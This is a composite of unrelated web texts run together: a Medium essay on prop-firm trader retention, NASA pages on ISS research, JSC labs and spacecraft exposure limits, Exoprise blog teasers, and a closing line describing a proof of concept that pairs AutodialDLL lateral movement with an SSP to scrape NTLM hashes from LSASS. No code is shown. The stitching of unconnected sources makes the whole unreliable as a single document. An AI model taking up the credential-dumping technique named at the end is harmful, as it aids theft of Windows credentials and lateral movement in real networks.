Most prop firms believe the hardest part is the evaluation. It isn’t.

The evaluation phase is structured, constrained, and explicit. Traders are told exactly what not to do. Risk is visible. Failure is immediate. Behavior is shaped by clear boundaries.

Funding changes everything.

Once capital scales, rules thin out. The leash comes off, but the thinking framework doesn’t evolve with it.

And that’s where firms quietly lose their best traders.

Evaluation Teaches Obedience. Funding Introduces Ambiguity.

During evaluations, traders are not learning how to trade profitably.

They are learning how to avoid disqualification.

That distinction matters.

Constraint-driven behavior works when:

• drawdown limits are tight,
• objectives are binary (pass/fail),
• and feedback is immediate.

Funding removes the binary outcome.

Suddenly, the trader isn’t asking:

“How do I pass?”

They’re asking:

“How do I not give this back?”

That shift is subtle… and lethal if unaddressed.

The Hidden Failure Point: Drawdown Behavior Drift

Most funded traders don’t blow accounts. They decay.

• Risk becomes defensive.
• Execution becomes hesitant.
• Opportunity selection narrows.

The equity curve doesn’t collapse — it bleeds.

From the firm’s side, this looks like:

• reduced trading frequency,
• fewer rule violations,
• fewer support tickets,
• and “stable” accounts.

From the trader’s side, it feels like:

• fear of expansion,
• paralysis under ambiguity,
• and confusion about what good risk now looks like.

Silence is often interpreted as stability. This is far from the truth.

Why “Risk Control” Gets Misunderstood: On Both Sides

Many traders internalize “control risk” as:

“Don’t lose.”

Many firms operationalize risk control as:

“Don’t break rules.”

Neither addresses decision-making quality under scaled capital.

Losses are not the enemy; unexamined behavior is.

A trader can follow every rule and still slowly exit profitability if they’re trading defensively against imagined threats instead of structured risk.

This is especially common among traders who passed evaluations cleanly — because they were good at constraint, not ambiguity.

👉 “Why Most Traders Fail After Passing Prop Firm Evaluations”

What the Strongest Firms Do Differently (Quietly)

The firms that survive long-term don’t simply loosen rules after funding.

They replace constraint with reasoning.

They help traders answer questions like:

• What does acceptable drawdown mean when scaling?
• When is reduced activity discipline, and when is it fear?
• How should risk expand without emotional justification?
• What signals matter when there’s no longer a pass/fail gate?

This isn’t motivation. It isn’t community hype. And it isn’t more dashboards. It’s thinking infrastructure.

Most firms stop teaching once the account is live.

That’s when teaching should actually begin.

👉 Execution Under Pressure: Why Most Traders Fail When It Actually Matters

The Cost of Not Addressing This Gap

When this post-funding gap goes unaddressed, firms experience:

• silent trader churn,
• declining lifetime value,
• increased payout volatility,
• and a constant need to “replace” traders who never technically failed.

Marketing doesn’t fix this. More flexible rules don’t fix this. Lower fees don’t fix this. The problem isn’t acquisition.

It’s retention through clarity.

A Final Thought for Founders

If your funded traders are quiet, compliant, and slowly shrinking in activity, that isn’t stability.

It’s uncertainty without guidance.

The firms that win the next phase of this industry won’t be the loudest. They’ll be the ones that understand how traders think once the leash comes off.

If this perspective resonates, it’s likely because you’ve already noticed fragments of it inside your own trader base.

I spend most of my time studying post-evaluation behavior. Not to coach traders emotionally, but to understand how decision-making changes once capital scales.

If exchanging notes on this gap would be useful, a quiet conversation is usually enough to tell whether there’s alignment.

Why Most Prop Firms Lose Traders After Funding (And Mistake Silence for Stability) was originally published in Coinmonks on Medium, where people are continuing the conversation by highlighting and responding to this story.

For more than 25 years, humans have lived and worked continuously aboard the International Space Station, conducting research that is transforming life on Earth and shaping the future of exploration. From growing food and sequencing DNA to studying disease and simulating Mars missions, every experiment aboard the orbiting laboratory expands our understanding of how humans can thrive beyond Earth while advancing science and technology that benefit people around the world.  

Unlocking new cancer therapies from space

The space station gives scientists a laboratory unlike any on Earth. In microgravity, cells grow in three dimensions, proteins form higher-quality crystals, and biological systems reveal details hidden by gravity. These conditions open new ways to study disease and develop treatments. 

Astronauts and researchers have used the orbiting laboratory to observe how cancer cells grow, test drug delivery methods, and examine protein structures linked to diseases such as Parkinson’s and Alzheimer’s. One example is the Angiex Cancer Therapy study, which tested a drug designed to target blood vessels that feed tumors. In microgravity, endothelial cells survive longer and behave more like they do in the human body, giving researchers a clearer view of how the therapy works and whether it is safe before human trials. 

Protein crystal growth (PCG) is another major area of cancer-related study. The NanoRacks-PCG Therapeutic Discovery and On-Orbit Crystals investigations have advanced research on leukemia, breast cancer, and skin cancers. Protein crystals grown in microgravity produce larger, better-organized structures that allow scientists to determine fine structural details that guide the design of targeted treatments. 

Studies in orbit have also provided insights about cardiovascular health, bone disorders, and how the immune system changes in space—knowledge that informs medicine on Earth and prepares astronauts for long missions in deep space. 

By turning space into a research lab, scientists are advancing therapies that benefit people on Earth and laying the foundation for ensuring crew health on future journeys to the Moon and Mars. 

Farming for the future 

Feeding astronauts on long-duration missions requires more than packaged meals. It demands sustainable systems that can grow fresh food in space. The Vegetable Production System, known as Veggie, is a garden on the space station designed to test how plants grow in microgravity while adding fresh produce to the crew’s diet and improving well-being in orbit. 

To date, Veggie has produced three types of lettuce, Chinese cabbage, mizuna mustard, red Russian kale, and even zinnia flowers. Astronauts have eaten space-grown lettuce, mustard greens, radishes, and chili peppers using Veggie and the Advanced Plant Habitat, a larger, more controlled growth chamber that allows scientists to study crops in greater detail. 

These plant experiments pave the way for future lunar and Martian greenhouses by showing how microgravity affects plant development, water and nutrient delivery, and microbial interactions. They also provide immediate benefits for Earth, advancing controlled-environment agriculture and vertical farming techniques that help make food production more efficient and resilient in challenging environments. 

First year-long twin study 

Understanding how the human body changes in space is critical for planning long-duration missions. NASA’s Twins Study offered an unprecedented opportunity to investigate nature vs. nurture in orbit and on Earth. NASA astronaut Scott Kelly spent nearly a year aboard the space station while his identical twin, retired astronaut Mark Kelly, remained on Earth. 

By comparing the twins before, during, and after the mission, researchers examined changes at the genomic, physiological, and behavioral levels in one integrated study. The results showed most changes in Scott’s body returned to baseline after his return, but some persisted—such as shifts in gene expression, telomere length, and immune system responses. 

The study provided the most comprehensive molecular view to date of how a human body adapts to spaceflight. Its findings may guide NASA’s Human Research Program for years to come, informing countermeasures for radiation, microgravity, and isolation. The research may have implications for health on Earth as well—from understanding aging and disease to exploring treatments for stress-related disorders and traumatic brain injury. 

The Twins Study demonstrated the resilience of the human body in space and continues to shape the medical playbook for the Artemis campaign to the Moon and future journeys to Mars. 

Simulating deep space 

The space station, which is itself an analog for deep space, complements Earth-based analog research simulating the spaceflight environment. Space station observations, findings, and challenges, inform the research questions and countermeasures scientists explore on Earth.   

Such work is currently underway through CHAPEA (Crew Health and Performance Exploration Analog), a mission in which volunteers live and work inside a 1,700-square-foot, 3D-printed Mars habitat for about a year. The first CHAPEA crew completed 378 days in isolation in 2024, testing strategies for maintaining health, growing food, and sustaining morale under delayed communication. 

NASA recently launched CHAPEA 2, with a four-person crew who began their 378-day simulated Mars mission at Johnson on October 19, 2025. Building on lessons from the first mission and decades of space station research, they will test new technologies and behavioral countermeasures that will help future explorers thrive during long-duration missions, preparing Artemis astronauts for the journey to the Moon and laying the foundation for the first human expeditions to Mars. 

Keeping crews healthy in low Earth orbit 

Staying healthy is a top priority for all NASA astronauts, but it is particularly important while living and working aboard the orbiting laboratory.  

Crews often spend extended periods of time aboard the orbiting laboratory, with the average mission lasting about six months or more. During these long-duration missions, without the continuous load of Earth’s gravity, there are many changes to the human body. Proper nutrition and exercise are some of the ways these effects may be mitigated. 

NASA has a team of medical physicians, psychologists, nutritionists, exercise scientists, and other specialized medical personnel who collaborate to ensure astronauts’ health and fitness on the station. These teams are led by a NASA flight surgeon, who regularly monitors each crew member’s health during a mission and individualizes diet and fitness routines to prioritize health and safety while in space. 

Crew members are also part of the ongoing health and performance research being conducted to advance understanding of long-term spaceflight’s effects on the human body. That knowledge is applied to any crewed mission and will help prepare humanity to travel farther than ever before, including the Moon and Mars. 

Sequencing the future 

In 2016, NASA astronaut Kate Rubins made history aboard the orbital outpost as the first person to sequence DNA in space. Using a handheld device called the MinION, she analyzed DNA samples in microgravity, proving that genetic sequencing could be performed in low Earth orbit for the first time. 

Her work advanced in-flight molecular diagnostics, long-duration cell culture, and molecular biology techniques such as liquid handling in microgravity. 

The ability to sequence DNA aboard the orbiting laboratory allows astronauts and scientists to identify microbes in real time, monitor crew health, and study how living organisms adapt to spaceflight. The same technology now supports medical diagnostics and disease detection in remote or extreme environments on Earth. 

This research continues through the Genes in Space program, where students design DNA experiments that fly aboard NASA missions. Each investigation builds on Rubins’ milestone, paving the way for future explorers to diagnose illness, monitor environmental health, and search for signs of life beyond Earth. 

Explore the timeline of space-based DNA sequencing. 

Explore More

4 min read

Susan Schuh: Supporting the Humans in Human Spaceflight 

Article 2 days ago

1 min read

NASA Marshall Removes 2 Historic Test Stands

Article 3 days ago

4 min read

Shaken, Not Stirred: NASA’s StarBurst Aces Extreme Temperature Tests

Article 4 days ago

Susan Schuh has dedicated her career to helping humans adapt to life beyond Earth.  

As the Flight Crew Integration Operational Habitability (OpsHab) team lead in NASA’s Human Health and Performance Directorate at Johnson Space Center in Houston, Schuh leads efforts to understand what it is really like to live and work in space. She turns that information into progress by documenting astronauts’ feedback to improve current and future spaceflight missions. 

Her work not only supports crews aboard the International Space Station, but also provides critical information for NASA’s preparations to explore more of the lunar surface than ever before through Artemis missions.  

Her team supports astronaut inflight and postflight debriefs, capturing and analyzing feedback to help NASA apply lessons learned. They also manage one of NASA’s most valuable habitability tools, the Crew Comments Database. With more than 115,000 entries spanning 25 years of International Space Station missions, it is the only comprehensive and searchable record of crew feedback in existence. Every comment, from how astronauts sleep to how they organize supplies, becomes part of NASA’s collective learning. 

“The Crew Comments Database is my work pride and joy,” Schuh said. “It’s been an invaluable resource for operations and development and continues to lend itself to future exploration.” 

Schuh’s path to NASA began with a mentor who saw her potential early on. While studying psychology at Flagler College in St. Augustine, Florida, she was introduced to human factors research by Dr. Gerald Gamache, whose work on the effects of the Chernobyl reactor explosion helped shape her understanding of how people function in complex environments.  

While completing her master’s degree in human factors and systems at Embry-Riddle Aeronautical University in Daytona Beach, Florida, Schuh began her first internship at NASA in 2000. “Even from the first days of my internship at Johnson, I knew I was meant to be a part of this community supporting humans living and working in space,” she said.  

Schuh left Johnson briefly to support human systems integration for the Navy and Air Force but returned in 2006. Since then, she has continued to shape how astronauts experience living and working in space. 

Her mentor’s influence extended beyond Schuh’s technical work. “Dr. Gamache was also a community builder outside of his professional life, and I’d like to think some of that rubbed off on me,” she said. That inspiration led her to found the Johnson Parenting community in 2020, which now includes more than 600 members who share support and resources for working parents across the center. 

Schuh has learned that her work is about more than data—it is about people. “Being purposeful in taking time to listen and be willing to learn and collaborate has made all the difference for me,” she said. “Over time, I’ve learned a lot about perseverance. This work has required it, encouraging folks to utilize the Crew Comments Database and keeping the feedback process empowered and robust.” 

She is most proud of her family, known as Team Schuh—her husband, Scott, who works on the Orion Ascent Abort Mode Team, and their three daughters, Wilhelmina, Lorelei, and Franny. “They’re the reason I keep striving to balance work, family, and everything in between,” she said.  

Finding that balance has been an ongoing struggle for her. “One of my biggest professional challenges, especially in the last 14 years since my oldest daughter was born, has been finding work-life balance,” she said. “I often struggle with creating boundaries and calling it a day at a reasonable time. I won’t pretend I have the secret recipe, but I’m working on it for sure.” Schuh credits the Johnson Parenting community for helping her and others along the way. 

Outside of work, Schuh finds peace in the water and in nature. Her father, who worked in underwater engineering, taught her to scuba dive when she was 11. “We’ve taken some amazing multi-day trips together, including multiple visits to Cay Sal Bank,” she said. “He’s my favorite dive buddy, and I look forward to many more dive trips with him.” 

Looking ahead, Schuh hopes to pass on that same sense of purpose she has found at NASA to the next generation. “Make connections and nurture them. It’s always cool to be kind,” she said. “Stay true to yourself and your values. Tell the people you admire how and why they inspire you.” 

Explore More

1 min read

NASA Starts Up Gateway’s Power System for First Time

Article 4 days ago

4 min read

NASA Celebrates Artemis II During Houston Texans Space City Day 

Article 5 days ago

4 min read

25 Years in Orbit: Science, Innovation, and the Future of Exploration 

Article 5 days ago

Ensuring Astronaut Safety

Achieving safe exploration of space in vehicles that rely upon closed environmental systems to recycle air and water to sustain life and are operated in extremely remote locations is a major challenge. The Toxicology and Environmental Chemistry (TEC) group at Johnson Space Center (JSC) is made up of 2 interrelated groups: Toxicology support and the Environmental Chemistry Laboratory. The scientists in both groups play an important role in ensuring that the crew of the ISS are breathing clean air and drinking clean water. Personnel within the TEC establish safe spacecraft environmental limits, monitor the air and water quality aboard current spacecraft (ISS and Commercial Crew and Cargo vehicles), and support technology advancements. The TEC employs in-flight monitoring capabilities as well as postflight sample analysis techniques to monitor the air and water quality from spaceflight.

Fun Fact: We are currently recovering 85% of the water from crew urine and turning it back into drinking water.

NASA

An Agency Resource

The Toxicology group at JSC serves as the NASA-wide resource for aspects of space toxicology and is responsible for several different duties that are focused on protecting crewmembers and spacecraft systems from toxic exposures in spaceflight. These include assessing chemical hazards for flight, establishing limits for contaminants in spacecraft air and water, assessing and evaluating environmental data from spacecraft in flight, and assessing the potential for off-gas products from new vehicles or modules. These assessments are documented in:

The Environmental Chemistry laboratory at JSC occupies approximately 6,000 sq. ft. of laboratory space in one of the newest buildings on site. This is a fully equipped environmental and analytical laboratory with analysts that have supported multiple human spaceflight programs and provided center support for both gas and liquid analysis. The work in the laboratories operates under an ISO 9001/AS9100-certified quality plan with dedicated and independent quality personnel. 

The Environmental Chemistry Laboratory monitors for contaminants in spacecraft air using both in-flight and post-flight methods. Onboard the International Space Station (ISS), 2 Air Quality Monitors (AQMs) use gas chromatography/differential mobility spectrometry to detect and quantify 23 target volatile organic compounds to provide near real-time insight into the status of the ISS atmosphere. Other real-time monitors supported by the Environmental Chemistry laboratory include the compound-specific analyzer-combustion products (CSA-CP), which use electrochemical sensors to analyze the atmosphere for the presence of compounds produced by fire, and the CO2 monitor, which uses non-dispersive infrared reflectance to monitor for the presence of elevated CO2. For detailed post-flight analysis in the Environmental Chemistry Laboratory, astronauts use grab sample containers to collect in-flight samples, which are then returned to JSC for a detailed environmental analysis. Similarly, formaldehyde monitoring kits contain badges used to collect formaldehyde. These also are returned to the ground for spectroscopic analysis. 

The Environmental Chemistry Laboratory also analyzes archival samples returned from the ISS. The majority of water consumed by crewmembers on the ISS is recycled from a combination of condensed atmospheric humidity and urine. This wastewater is then treated by the U.S. water processor assembly (WPA) to produce potable water, which is analyzed to ensure that the water meets U.S. potability requirements. Samples of the humidity condensate and condensate/urine distillate also are returned for analysis to provide insight into the operation of the WPA and the overall US water recovery system. The TEC relies upon the in-flight analytical capability provided by the ISS total organic carbon analyzer (TOCA) to determine real-time total organic carbon concentrations, which are used to protect ISS crew health as well as manage the U.S. water system consumables. Similarly, the colorimetric water quality monitoring kit (CWQMK) is used to provide insight into the biocide concentration in the U.S. water.

Water samples are also collected in flight and stored for return to Johnson Space Center.  The following ground-based equipment is used to analyze archival samples to ensure suitable air and water quality:

• Liquid Chromatography/Refractive Index Detection (LC/RI)
• Gas Chromatography/Flame Ionization Detector (GC/FID)
• Gas Chromatography/Thermal Conductivity Detector (GC/TCD)
• Trace Gas Analyzer
• Gas Chromatography/Mass Spectrometry (GC/MS)
• Liquid Chromatography/Mass Spectrometry (LC/MS)
• Inductively Coupled Plasma/Mass Spectrometry (ICP/MS)
• Ion Chromatography (IC)
• UV/VIS Spectrophotometry
• Fourier Transform Infrared Reflectance (FTIR)
• Total Organic Carbon Analyzer (TOCA)

In addition to analysis of flight samples and real-time data, the Environmental Chemistry laboratory team plays an important role in the development of new Environmental Control and Life Support Systems hardware by providing analytical support during ground testing. Similarly, the TEC scientists pursue and support technology demonstrations aimed at developing new methods for real-time data collection. Recent examples of this support have included the multi-gas monitor (MGM) and the personal CO₂ monitor. TEC scientists make vital contributions to consolidating environmental monitoring hardware to reduce mass and volume requirements, both of which are important as NASA moves to more long-term missions in smaller vehicles.

Spaceflight Air and Water Quality

Toxicology and Environmental Chemistry (TEC) monitors airborne contaminants in both spacecraft air and water. In-flight monitors are employed to provide real-time insight into the environmental conditions on ISS. Archival samples are collected and returned to Earth for full characterization of ISS air and water.

Points of Contact

Paul Mudgett, PhD
Valerie Ryder, PhD DABT
Spencer Williams, PhD DABT
William T. Wallace, PhD

Explore More

4 min read

Space Radiation

Article 3 years ago

2 min read

Acoustics and Noise Control

Article 3 years ago

2 min read

Microbiology

Article 1 day ago

Keep Exploring

Discover More Topics From NASA

Humans In Space

Missions

International Space Station

Solar System

Enabling Successful Research

A major aim of biomedical research at NASA is to acquire data to evaluate, understand, and assess the biomedical hazards of spaceflight and to develop effective countermeasures. Data Science (S&DS) personnel provide statistical support to groups within the NASA JSC Human Health and Performance Directorate and other NASA communities. They have expertise in the development of complex study designs, the application of modern statistical methods, and the analysis of data collected under NASA operational constraints (small sample sizes, the limited population of astronauts). 

Fun Fact: Did you know statistics is more than just means and standard deviations? Statistics is the science of collecting, analyzing, presenting and interpreting data. NASA depends on data to make decisions and statistics is crucial to making good decisions. Statistics and Data Science (S&DS) help transform data into evidence.

NASA

Data Science Support

Beyond statistics, the group aids with data engineering and exploring data. Data engineering includes extracting and transforming data in preparation for analysis and visualization. Data can come in many different formats, the S&DS team helps researchers harmonize (bring data sets together) information across sources. Exploration includes initial analysis and building informative visualizations to deepen the understanding of the evidence. Analyzing and interpreting data to produce insights follow. 

Statistical Consulting Services

The S&DS team provides collaboration and consulting expertise to the Directorate in the application of statistical theory and practice to ongoing biomedical research. Personnel aid in the preparation of sections of research proposals that deal with experiment design, statistical modeling, and subsequent analysis of anticipated research data. Once data are gathered, S&DS statisticians assist with analysis, visualization, and interpretation of results so that investigators can extract the most information while maintaining statistical integrity. A S&DS statistician may be a co-investigator on a project requiring sophisticated statistical modeling and/or analysis techniques. Through collaboration, members of the S&DS team expand their knowledge base in such diverse medical fields as environmental physiology, osteopathy, neurology, pharmacology, microbiology, cardiology, nutrition, and psychology. To meet the unique data collected by NASA, statisticians may develop new techniques to address challenges such as small sample sizes of ISS studies, missing data, operational constraints, and novel measures of outcome. 

Outreach

Collaborators with the S&DS team often reside within the Directorate, but statistics and data science support is extended to other organizations within the Johnson Space Center, including the Engineering Directorate, Human Resources, and the Education Office. The S&DS team also provides a venue wherein high school, undergraduate, and graduate interns can participate in the analysis and interpretation of NASA biomedical data. Students assigned to the S&DS team have a rare opportunity to gain real-world experience with research in a variety of biomedical fields.

Point of Contact

Millennia Young, PhD

Explore More

3 min read

Bone and Mineral Evaluation and Analysis

Article 3 years ago

3 min read

Exercise Physiology and Countermeasures

Article 3 years ago

1 min read

Core Laboratory

Article 3 years ago

Keep Exploring

Discover More Topics From NASA

Humans In Space

Missions

International Space Station

Solar System

Microorganisms and Spaceflight

Spaceflight poses a risk of adverse health effects due to the interactions between microorganisms, their hosts, and their environment. The JSC Microbiology team addresses the benefits and risks related to microorganisms, including infectious disease, allergens, environmental and food contamination, and the impacts of changes in environmental and human microbial ecology aboard spacecraft. The team includes certified medical technologists, environmental microbiologists, mycologists, and biosafety professionals.

The JSC Microbiology laboratory is a critical component of the Human Health and Performance Directorate and is responsible for addressing crew health and environmental issues related to microbial infection, allergens, and contamination. This responsibility is achieved by operational monitoring and investigative research using classical microbiological, advanced molecular, and immunohistochemical techniques. This research has resulted in a significant number of presentations and peer-reviewed publications contributing to the field of Microbiology with articles in journals such as Infection and Immunity, Journal of Infectious Disease and Applied and Environmental Microbiology, Nature Reviews Microbiology, and Proceedings of the National Academies of Science.

Fun Fact: Microorganisms display unexpected responses when grown in the spaceflight environment compared to otherwise identically grown microbes on Earth.

NASA

Keeping Crew-members Safe

As a functional part of the Crew Health Care System and in support of Environmental Control and Life Support Systems engineers, the Microbiology Laboratory team defines requirements, coordinates and analyzes microbial sampling, and analysis of air, surface, and water samples. These environmental samples, including preflight and in-flight samples, re-analyzed to ensure that microorganisms do not adversely affect crew health or system performance.

Microbiologists also serve as team members when anomalous events occur that might affect crew health or life support systems operations. Spaceflight food samples also are evaluated preflight to decrease the risk of infectious disease to the crew.

Technology and Hardware

• ABI DNA sequencer
• Illumina MiSeq desktop sequencer
• Oxford Nanopore Technologies MinION DNA / RNA sequencers
• Agilent Bioanalyzer
• VITEK 2 Microbial Identification
• ​Space analogue bioreactors

Points of Contact

Sarah Wallace, PhD
Hang Nguyen, PhD

Explore More

4 min read

Space Radiation

Article 3 years ago

5 min read

Toxicology and Environmental Chemistry

Article 3 weeks ago

2 min read

Acoustics and Noise Control

Article 3 years ago

Keep Exploring

Discover More Topics From NASA

Humans In Space

Missions

International Space Station

Solar System

Does Spaceflight Alter the Human Immune System?

Getting sick on Earth is nothing to sneeze at, but for astronauts on deep space exploration missions, the risk for contracting diseases may be elevated due to altered immunity. The Human Health and Performance Directorate’s Immunology/Virology Laboratory is ideally suited to study the effects of spaceflight on the immune system. When immune cells do not function properly, the immune system cannot respond properly to threats. This may increase susceptibility to infectious disease. Altered immunity can also lead to latent virus shedding, which is the “reawakening” of certain viruses we contract in our youth by which stay with us through adulthood. Reactivation of these viruses has been observed in some crewmembers. Conversely, when immune activity heightens, the immune system reacts excessively, resulting in things like allergy or persistent rashes, which also have been reported by some crewmembers during flight. Working in collaboration with the Human Research Program, the Immunology/Virology Laboratory is actively working to characterize the changes in astronauts’ immune system during spaceflight as well as developing countermeasures to help mitigate the clinical risks for astronauts during these missions to other planets, moons, or asteroids.

Understanding the Impact of Spaceflight on Human Immune Systems

Immunology/Virology Laboratory team supported studies conducted aboard the Space Shuttle and supports investigations currently performed aboard the ISS. For studies of astronauts, the laboratory validated a novel sampling strategy to return ambient live astronaut blood samples to Earth for comprehensive immunological testing and has developed several novel biomedical assays to evaluate immunity in humans. Results from a recent immunology investigation aboard the ISS called “Validation of Procedures for Monitoring Crewmember Immune Function” or “Integrated Immune”’ were published in the journal Nature Microgravity. The data confirms that ISS crews have alterations in both the number and function of certain types of immune cells and that these alterations persist for the duration of a 6-month spaceflight. Other data from the study published in the Journal of Interferon & Cytokine Research indicates that ISS crews have changes in their blood levels of specific immune proteins called ”cytokines” during flight which persist for the duration of a 6-month mission. The laboratory is currently preparing to support physiological monitoring of Artemis deep space astronauts via novel technology developed in-house. 

Learning About Spaceflight While on Earth  

The Immunology/Virology Laboratory also supports human investigations performed in Earth-based “space analog” situations. Such analogs are places where some specific conditions of spaceflight are replicated. Examples include undersea deployment, closed chamber isolation, or Antarctica winter over. Analog work may shed mechanistic light on the causes of alterations observed during flight or provide locations useful for the testing of countermeasures. The Immunology Laboratory recently supported a European Space Agency 2-year study performed at Concordia Station, Dome C, and Antarctica. Biomedical samples were collected, processed, and stabilized over the Antarctica winter by Concordia crewmembers, and preserved for shipment to NASA. The data revealed that Concordia crewmembers also experience unique patterns of immune dysregulation, some of which are like astronauts’ patterns. The laboratory also has supported recent studies in Antarctica at McMurdo Station, Neumayer III Station, and Palmer Station.

The Immunology/Virology Laboratory team also participates in ground-based investigations to determine the mechanistic reasons why certain types of immune cells do not function well during microgravity conditions. For these studies, a terrestrial “model” of microgravity cell culture is employed, referred to as “clinorotation.” Essentially, cell cultures are slowly rotated around a horizontal axis. During clinorotation, immune cells generally respond as they would during spaceflight.

Improving Life in Space and on Earth

To “connect the dots” between observed immune changes in astronauts and potential adverse clinical consequences, the Immunology/Virology Laboratory team may support Earth-based clinical investigations. These investigations consist of studies, conducted in collaboration with physicians, of defined patent populations. The same assays, which define immune changes in astronauts, may be applied to clinical patients and the data will help NASA scientists and flight surgeons interpret the flight information, in the context of clinical risk to astronauts. To date, the Immunology/Virology Laboratory team has supported a European clinical investigation of emergency room patients, and a Houston-based investigation of shingles patients.

The Immunology/Virology Laboratory team has developed, working with translational scientists all over the world, a potential countermeasure to improve immunity in deep-space astronauts. The protocol published in the Frontiers in Immunology consists of stress-relieving techniques, certain nutritional supplements, a prescription of aerobic and resistive exercise, certain medications, and monitoring. This protocol soon will be tested at Palmer Station, Antarctica, to be followed by a flight validation aboard ISS. 

Our Facility, Technology, and Hardware

Immunologists and virologists comprise the core research staff of the laboratory and postdoctoral associates, visiting scientists, and graduate students routinely perform rotations of varying lengths in the laboratory. The laboratory currently possesses an array of sophisticated research equipment, including:

• Ten-, and Four-color Flow Cytometers
• 41-analyte capable Multiplex Analyzer
• Real-time Polymerase Chain Reaction System
• Fluorescent Microscopes
• Confocal Microscope
• Cell culture, including modeled-microgravity, facilities

In addition, we partner with the Bioanalytical Core Laboratory (BCL) to leverage equipment such as the environmental scanning electron microscope.

Points of Contact

Brian Crucian, PhD
Mayra Nelman-Gonzalez
Satish Mehta, PhD

Explore More

2 min read

Medical and Clinical

Article 3 years ago

4 min read

Neuroscience

Article 3 years ago

5 min read

Nutritional Biochemistry

Article 3 years ago

Keep Exploring

Discover More Topics From NASA

Humans In Space

Missions

International Space Station

Solar System

The JSC toxicologists establish guidelines for safe and acceptable levels of individual chemical contaminants in spacecraft air (SMACs) and drinking water (SWEGs) in collaboration with the National Research Council’s Committee on Toxicology (NRC COT) and through peer-reviewed publication.  The framework for establishing these levels is documented for SMACs and SWEGs, and recent refinements to the Methods reflect current risk assessment practices.

In addition to official SMACs used for the evaluation of spacecraft air, JSC toxicologists set interim 7-day SMAC values that are listed in NASA Marshall Space Flight Center’s Materials and Processes Technical Information System (“MAPTIS”), which is used to evaluate materials and hardware off-gassing data.  

Spacecraft Maximum Allowable Concentrations for Selected Airborne Contaminants

A table listing the official NASA SMAC values is published in JSC 20584 (PDF, 1MB) (Last revised – June 2024). References for the published values are provided below:

• NRC (1994) Spacecraft Maximum Allowable Concentrations for Selected Airborne Contaminants, Volume 1, National Academy Press, Washington, D.C.
• NRC (1996) Spacecraft Maximum Allowable Concentrations for Selected Airborne Contaminants, Volume 2, National Academy Press, Washington, D.C.
• NRC (1996) Spacecraft Maximum Allowable Concentrations for Selected Airborne Contaminants, Volume 3, National Academy Press, Washington, D.C.
• NRC (2000) Spacecraft Maximum Allowable Concentrations for Selected Airborne Contaminants, Volume 4, National Academy Press, Washington, D.C.
• NRC (2008) Spacecraft Maximum Allowable Concentrations for Selected Airborne Contaminants, Volume 5, National Academy Press, Washington, D.C.
• Meyers VE, Garcia HD, James JT. Safe Human Exposure Limits for Airborne Linear Siloxanes during Spaceflight. Inhalation Toxicology 2013; 25(13):735-46.
• Romoser AA, Ryder VE, McCoy JT. Spacecraft Maximum Allowable Concentrations for Manganese Compounds in Mars Dust. Aerosp Med Hum Perform. 2019; 90(8):709-719.
• Scully RR, Garcia H, McCoy JT, Ryder VE. Revisions to Limits for Methanol in the Air of Spacecraft. Aerosp Med Hum Perform. 2019; 90(9):807-812.
• Garcia, H.D, Acceptable Limits for n-Hexane in Spacecraft Atmospheres. Aerospace Medicine and Human Performance. 2021;92(12);956-961. 
• Ryder, V.E. and Williams, E.S. Revisions to Limits for Propylene Glycol in Spacecraft Air. Aerospace Medicine and Human Performance. 2022; 93(5);467-469. 
• Lam CW, Ryder VE. Spacecraft Maximum Allowable Concentrations for Hydrogen Fluoride. Aerospace Medicine and Human Performance. 2022; 93(10)746-748.
• Williams ES, Ryder VE. Spaceflight Maximum Allowable Concentrations for Ethyl Acetate. Aerospace Medicine and Human Performance. 2023; 94(1):25–33.
• Ryder VE and Williams ES. Revisions to Acute/Off-Nominal Limits for Benzene in Spacecraft Air. Aerospace Medicine and Human Performance. 2023; 94(7):544–545.
• Wimberly, AA and Ryder VE. Exposure Limits for Hydrogen Sulfide in Spaceflight. NASA/TM-20240000101, NASA Johnson Space Center, 2024.
• Tapia CM, Langford SD, Ryder VE. Revisions to Limits for Toluene in Spacecraft Air. Aerosp Med Hum Perform. 2024; 95(7):399-402.
• Ryder VE. Revisions to limits for 2-propanol in spacecraft air. Aerosp Med Hum Perform. 2025; 96(4):360–362.
• Williams ES, Tapia CM, Ryder V. Revisions to spacecraft maximum allowable concentrations for acetaldehyde. Aerosp Med Hum Perform. 2025; 96(11):1019–1023.
• Ryder VE. Revisions to Spacecraft Maximum Allowable Concentrations for 2-Butanone. Aerosp Med Hum Perform. 2025 Dec;96(12):1094-1097.

Spacecraft Water Exposure Guidelines for Selected Waterborne Contaminants

A table listing the official NASA SWEG values is published in JSC 63414 Rev A (PDF, 426KB) (Last revised – November 2023). References for the published values are provided below:

• NRC (2004) Spacecraft Water Exposure Guidelines for Selected Contaminants, Volume 1, National Academy Press, Washington, D.C.
• NRC (2006) Spacecraft Water Exposure Guidelines for Selected Contaminants, Volume 2, National Academy Press, Washington, D.C.
• NRC (2008) Spacecraft Water Exposure Guidelines for Selected Contaminants, Volume 3, National Academy Press, Washington, D.C.
• Ramanathan R, James JT, McCoy T. (2012) Acceptable levels for ingestion of dimethylsilanediol in water on the International Space Station. Aviat Space Environ Med. 83(6):598-603.
• Garcia, HD, Tsuji, JS, James, JT. (2014) Establishment of exposure guidelines for lead in spacecraft drinking water. Aviat Space Environ Med. 85:715-20.

Explore More

5 min read

Toxicology and Environmental Chemistry

Article 4 hours ago

3 min read

Hazardous Material Summary Tables (HMSTs)

Article 2 weeks ago

4 min read

Toxicology Analysis of Spacecraft Air

Article 2 weeks ago

Keep Exploring

Discover More Topics From NASA

Missions

Humans in Space

Climate Change

Solar System

When users complain of dropped video calls, stuttering applications, or files that won't upload properly, 90% of the time you can probably blame packet loss. It's one of those network performance issues that make you feel like the whole network is shot, even when your equipment is fine.

In the hyperconnected world, mobile network performance monitoring is crucial for staying online and never missing a beat. With the widespread adoption of mobile networks for business activities, it is vital to understand how to monitor network performance to avoid downtime, high latency, and overall interruptions.

With the digital landscape today, maintaining seamless connectivity is a priority for most organizations. However, Internet Service Providers (ISPs), the Internet, and Software-Defined Wide Area Network (SDWAN) performance issues can severely impact operations, frustrate end-users, and can be costly when downtime occurs. Having recognized these challenges organizations face, we are excited to introduce our newest…

The post Improve End-to-End Visibility With Network Segment Analysis appeared first on Exoprise.

At Exoprise, we always listen to customers’ input and ensure they have the best experience possible. Our customer success, support, and engineering teams have been hard at work, collecting this feedback and insights to identify the functionality and features loved by our customers. Today, we’ll be sharing the top five favorites that have been brought…

The post What Customers Love About Exoprise appeared first on Exoprise.

A PoC that combines AutodialDLL lateral movement technique and SSP to scrape NTLM hashes from LSASS process.

Description

